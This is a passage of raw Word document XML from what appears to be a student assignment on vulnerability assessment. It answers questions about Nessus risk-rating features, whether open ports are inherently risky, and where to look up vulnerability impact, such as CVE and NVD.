          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7D9072" wp14:editId="5AE27E13">
            <wp:extent cx="5943600" cy="2863215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74608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88443" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2863215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E78569" w14:textId="7E8DDDA2" w:rsidR="00C30DDC" w:rsidRPr="005A1DF7" w:rsidRDefault="00C30DDC" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30DDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237C9527" wp14:editId="55C6D12A">
            <wp:extent cx="5943600" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="111541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2212" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C100B" w14:textId="5B84EFA0" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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While Nessus provides suggestions for remediation steps, what else does Nessus provide that can help you assess the risk impact of the identified software vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC4ECA" w14:textId="5C942166" w:rsidR="00895EF4" w:rsidRDefault="00895EF4" w:rsidP="00895EF4">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7B1D6" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In addition to providing suggestions for remediation steps, Nessus provides several features and functionalities that can help you assess the risk impact of identified software vulnerabilities. Here are some key capabilities of Nessus in risk impact assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E2878" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7013799A" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Vulnerability Severity Ratings: Nessus assigns severity ratings to identified vulnerabilities based on industry-standard scoring systems like Common Vulnerability Scoring System (CVSS). These ratings help prioritize vulnerabilities by their potential </w:t>
      </w:r>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>impact and exploitability, allowing you to focus on high-risk vulnerabilities that pose a greater threat to your systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D0C72" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794342DC" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Vulnerability Descriptions and Technical Details: Nessus provides detailed descriptions of identified vulnerabilities, including information about the affected software, vulnerability type, potential attack vectors, and possible consequences. These details enable you to understand the nature of the vulnerability, its potential impact on your systems, and the level of expertise required to exploit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468DCC6" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EA4C4D" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Exploitability Assessments: Nessus can perform additional checks and assessments to determine the exploitability of identified vulnerabilities. It may utilize plugins or vulnerability checks that test for exploit code or other indicators of active exploitation in the wild. This information helps you gauge the likelihood of a vulnerability being successfully exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E24E6" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5A8038" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Contextual Information: Nessus gathers contextual information during the scanning process, such as the network environment, system configurations, and asset information. This context can help you better understand the potential impact of a vulnerability by considering factors like network segmentation, the presence of compensating controls, or the value and sensitivity of the affected assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5B711" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497CCF08" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Historical Data and Trend Analysis: Nessus can maintain a history of scan results over time, allowing you to track the presence and remediation status of vulnerabilities. This data can be useful for trend analysis, identifying recurring vulnerabilities, and assessing the effectiveness of your vulnerability management efforts. It provides insights into the persistence and impact of vulnerabilities in your environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F472A" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF9E741" w14:textId="77777777" w:rsidR="00402EB8" w:rsidRPr="00402EB8" w:rsidRDefault="00402EB8" w:rsidP="00402EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>6. Reporting and Visualization: Nessus generates comprehensive reports that summarize the risk impact of identified vulnerabilities. These reports can include vulnerability details, severity ratings, affected assets, recommended remediation steps, and additional contextual information. Nessus reports often present the risk impact in a clear and actionable format, facilitating effective communication with stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E065F0" w14:textId="15E9C6D0" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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Are open ports necessarily a risk? Why or why not?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE4349" w14:textId="74E85876" w:rsidR="00C91079" w:rsidRDefault="00C91079" w:rsidP="00C91079">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E5EF7" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open ports themselves are not necessarily a risk. The level of risk associated with open ports depends on various factors, including the context, the services running on those ports, and the security measures in place. Here are some considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ADF52F" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A3E28A" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Service Vulnerabilities: Open ports may expose services that have known vulnerabilities. If these services are outdated, misconfigured, or contain unpatched vulnerabilities, they can be exploited by attackers to gain unauthorized access or compromise the system. It's important to regularly update and secure the services running on open ports to mitigate this risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36B980" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11773699" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Unauthorized Access: Open ports provide potential entry points for attackers. If unauthorized individuals gain access to services or systems through open ports, they can exploit vulnerabilities, perform unauthorized actions, or conduct further attacks within the network. Proper access control measures, such as strong passwords, authentication mechanisms, and firewall rules, can help reduce this risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25764FEB" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E4B706" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Network Exposure: Open ports can provide information about the network infrastructure and services running within it. This information may aid attackers in reconnaissance activities, such as mapping the network, identifying potential targets, or crafting targeted attacks. Network segmentation, access controls, and regular monitoring can help mitigate the risk of exposing too much information through open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E340D" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062FAC85" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Port Scanning and Probing: Open ports can be discovered through port scanning and probing activities. Attackers often scan networks to identify open ports and potential vulnerabilities. However, it's important to note that the presence of open ports alone does not guarantee successful exploitation. Proper security measures, including intrusion detection and prevention systems (IDS/IPS), can detect and respond to such scanning activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA1CF7" w14:textId="77777777" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3627D8" w14:textId="38751DB9" w:rsidR="00BD5D83" w:rsidRPr="00BD5D83" w:rsidRDefault="00BD5D83" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5D83">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Secure Configuration: Open ports should be properly configured to minimize risk. Unnecessary or unused ports should be closed, and only essential services should be exposed to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3C375" w14:textId="00021861" w:rsidR="00C91079" w:rsidRPr="00BD5D83" w:rsidRDefault="00C91079" w:rsidP="00BD5D83">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B39043" w14:textId="447CCC70" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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When you identify a known software vulnerability, where can you go to assess the risk impact of the software vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F2A37" w14:textId="2C7DDEB0" w:rsidR="00853F15" w:rsidRDefault="00853F15" w:rsidP="00853F15">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087FF90" w14:textId="45E17075" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When identifying a known software vulnerability, there are several reliable sources where you can assess the risk impact of the vulnerability. Here are some commonly used resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63FB20" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Vendor Documentation: The software vendor's official documentation is often a valuable source of information about software vulnerabilities. The vendor may provide security advisories, release notes, or knowledge base articles that outline the </w:t>
      </w:r>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>impact of the vulnerability, affected versions, and recommended actions for mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5BCDC" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4B33A5" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Common Vulnerabilities and Exposures (CVE): CVE is a widely recognized dictionary of publicly known information security vulnerabilities and exposures. It provides unique identifiers (CVE IDs) for vulnerabilities and associated details, including descriptions, impact severity, affected software versions, and links to additional resources. You can search for specific CVE IDs or browse through the CVE database to gather information about the risk impact of a software vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08EDBF" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7495AA0D" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. National Vulnerability Database (NVD): NVD is the U.S. government repository of standardized vulnerability management data. It provides comprehensive information on vulnerabilities, including impact severity ratings, technical details, and references to other vulnerability resources. NVD is a trusted source for assessing the risk impact of software vulnerabilities and is often referenced by other security databases and tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9A39E" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F6B7A6" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745BF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Exploit Databases and Security Research Communities: There are various exploit databases and security research communities that provide information about software vulnerabilities, including exploit code, proof-of-concept demonstrations, and discussions. These resources can offer insights into the potential impact and exploitability of a vulnerability. Examples of such platforms include Exploit Database, Metasploit Framework, and security-focused forums and mailing lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF00736" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C518D65" w14:textId="77777777" w:rsidR="00745BF4" w:rsidRPr="00745BF4" w:rsidRDefault="00745BF4" w:rsidP="00745BF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
